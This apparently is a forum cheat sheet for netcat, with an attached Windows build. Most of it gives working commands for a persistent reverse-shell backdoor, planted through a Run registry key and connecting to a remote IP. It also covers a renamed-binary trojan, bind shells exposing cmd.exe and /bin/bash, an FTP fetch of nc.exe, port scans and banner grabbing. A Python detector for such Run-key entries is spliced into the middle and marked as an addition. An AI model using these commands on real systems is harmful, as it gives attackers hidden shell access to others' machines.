
Netcat

[[ Description ]]

Netcat is a full-featured networking utility that reads and writes data across network connections using the TCP/IP protocol.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

[[ Example ]]

Reverse Backdoor
Download Netcat and place it in the windows\system32 directory.
**********************************************************************

Add a registry entry so that it connects back each time the machine boots:
**********************************************************************
reg add hklm\software\microsoft\windows\currentversion\run /v Mynetcat /t reg_sz /d "nc -d -e cmd.exe 192.168.1.173 555"
**********************************************************************
Set up the listening port on the remote machine:
nc -l -v -p 555
**********************************************************************

Netcat Port Redirection
1. Computer A IP 10.10.10.1
2. Computer B IP 10.10.10.2
3. Open 1 DOS window on computer A
4. Open 2 DOS windows on computer B
5. Type this in the DOS window on A: nc -v -L -p 777 -e "nc 10.10.10.2 777"
6. Type this in the first DOS window on B: nc -v -L -p 777
7. Type this in the second DOS window on B: nc -v 10.10.10.1 777
8. Now type stuff in the second DOS window on B; you should see it in the first DOS window on B, and A should show one connection made.
Another relay using the same pattern:
nc -L -p 9000 -e "nc truemobile.net 9001"
nc -l -p 9000
********************************************************************************
Scanning with Netcat
nc -v -v -z 127.0.0.1 1-53
nc -v -v -z 127.0.0.1 21 25 53 139
nc -v -v -z example.host 80 139 1433
nc -v -u -z -w 3 example.host 20-30
nc -v -v -z -u -r example.host 111 66-70 88 53 87 161-164 121-123 213 49 2
nc -v -v -z -r example.host 21-25 42 53 66-80 107-118 137-139 156 161 162 389 568 569 1025 1027 1352 1433
***********************************************************************************
Banner Grabbing with Netcat
• nc -nvv xxx.xxx.xxx.xxx 80
• nc -nvv xxx.xxx.xxx.xxx 8080
• HEAD / HTTP/1.0
• [Carriage return]
• [Carriage return]
• nc -v www.website.com 80 < get.txt (retrieve from a web site and check for file presence)
• Your get.txt file will contain "GET / HTTP/1.0\n\n"
echo "blahblahblah" | nc example.host 80 > default.htm
cat get.txt | nc example.host 80
**************************************************************************************
Netcat as Trojan
• Batch file (winlog.exe is a renamed nc.exe):
– @echo off
– winlog.exe -L -d -p 139 -t -e cmd.exe
• Once you have run the batch file on the box you want to trojan, telnet to it:
– c:\>nc -v [ipaddress of target] [port]
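The "Reverse Backdoor" and "Netcat as Trojan" sections above both persist a netcat listener or connect-back via a Run key or a batch file, and the trojan variant renames nc.exe to winlog.exe, so a defender cannot key on the file name alone. The following is an added detection example, not code from this page or from the netcat project: it parses reg-query-style Run key output and flags entries by their argument pattern (-e handing the connection to a shell, -l/-L -p listeners, -d detach, connect-back to an IP and port). The registry dump is constructed sample data; the value names SecurityHealth, Updater and OneDrive are made up for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the shape of `reg query HKLM\...\Run` output.
# Two entries mirror the page's examples; the others are benign filler.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Mynetcat          REG_SZ           nc -d -e cmd.exe 192.168.1.173 555
    Updater           REG_SZ           winlog.exe -L -d -p 139 -t -e cmd.exe
    OneDrive          REG_SZ           "C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

# Programs that, handed a socket via -e, give the remote side a shell.
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell",
          "/bin/sh", "/bin/bash", "sh", "bash"}
# Well-known netcat binary names (the renamed-binary case is caught by flags instead).
NC_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}


@dataclass
class Finding:
    name: str
    command: str
    reasons: list = field(default_factory=list)


def parse_run_entries(text):
    """Return (value_name, command) pairs from reg-query-style output."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"\s+(\S+)\s+(REG_[A-Z_]+)\s+(.+?)\s*$", line)
        if m:
            entries.append((m.group(1), m.group(3)))
    return entries


def analyze_command(command):
    """List the reasons a command line looks like a netcat listener or connect-back."""
    tokens = command.replace('"', " ").replace("'", " ").split()
    if not tokens:
        return []
    reasons = []
    exe = tokens[0].rsplit("\\", 1)[-1].lower()
    if exe in NC_NAMES:
        reasons.append("netcat binary name")
    # -e <program>: the connection is wired to that program's stdin/stdout.
    for i, tok in enumerate(tokens[:-1]):
        nxt = tokens[i + 1].lower().rsplit("\\", 1)[-1]
        if tok == "-e" and nxt in SHELLS:
            reasons.append(f"-e spawns shell {tokens[i + 1]}")
    flags = {t for t in tokens[1:] if t.startswith("-")}
    if flags & {"-l", "-L"} and "-p" in flags:
        reasons.append("listener on fixed port (-l/-L -p)")
    if "-d" in flags:
        reasons.append("-d detaches from console")
    if "-e" in flags and re.search(r"\b\d{1,3}(\.\d{1,3}){3}\s+\d{1,5}\b", command):
        reasons.append("connect-back to IP:port with -e")
    return reasons


def scan_run_key(text):
    """Flag Run entries on behaviour (shell via -e, or a known netcat name), not file name."""
    findings = []
    for name, command in parse_run_entries(text):
        reasons = analyze_command(command)
        if any(r.startswith("-e spawns shell") or r == "netcat binary name" for r in reasons):
            findings.append(Finding(name, command, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_run_key(SAMPLE_RUN_KEY):
        print(f"{f.name}: {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

The same analyze_command check applies to the page's Unix form (nc -v -l -p 5050 -e '/bin/bash'), since it matches on the -e shell argument and the -l -p listener flags rather than on the Windows binary name.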
****************************************************************************************
Netcat FTP Stuff
• make the script
– echo user>GetNc.txt
– echo password>>GetNc.txt
– echo bin>>GetNc.txt
– echo get nc.exe>>GetNc.txt
– echo bye>>GetNc.txt
• run the script to get netcat
– ftp -s:GetNc.txt x.x.x.x
– del GetNc.txt
• run netcat
– nc -l -p 999 -t -e cmd.exe
****************************************************************************************
Netcat Connecting
• From outside the firewall, connect to the listening machine:
nc -v xxx.xxx.xxx.xx 53
nc -p 31337 example.host 139
nc -v -v -p 31337 example.host 139
nc -w 5 -p 31337 example.host 139
nc -v -v -w 5 -p 31337 example.host 139
*****************************************************************************************
Netcat Connecting
• irc.cmd (Connect to an IRC server)
– @echo off
– echo Connecting you to IRC liberty.dal.us.dal.net
– nc -v 208.51.159.10 6667
– USER a a a a
– bbbbbbbbbb
********************************************************************************************
Compile Netcat under UNIX
• Unix Netcat compile option
• Compile netcat with -DGAPING_SECURITY_HOLE, then:
• nc -v -l -p 5050 -e '/bin/bash' (on the server)
• nc -v [server ip] 5050 (on your box)
• Alternatively, without -e: you enter your stuff on port 5050 and get output on 5051
• nc -l -p 5050 | /bin/bash | nc -l -p 5051 2>&1
*********************************************************************************************


Attachment: nc111nt.zip (104.42 KB)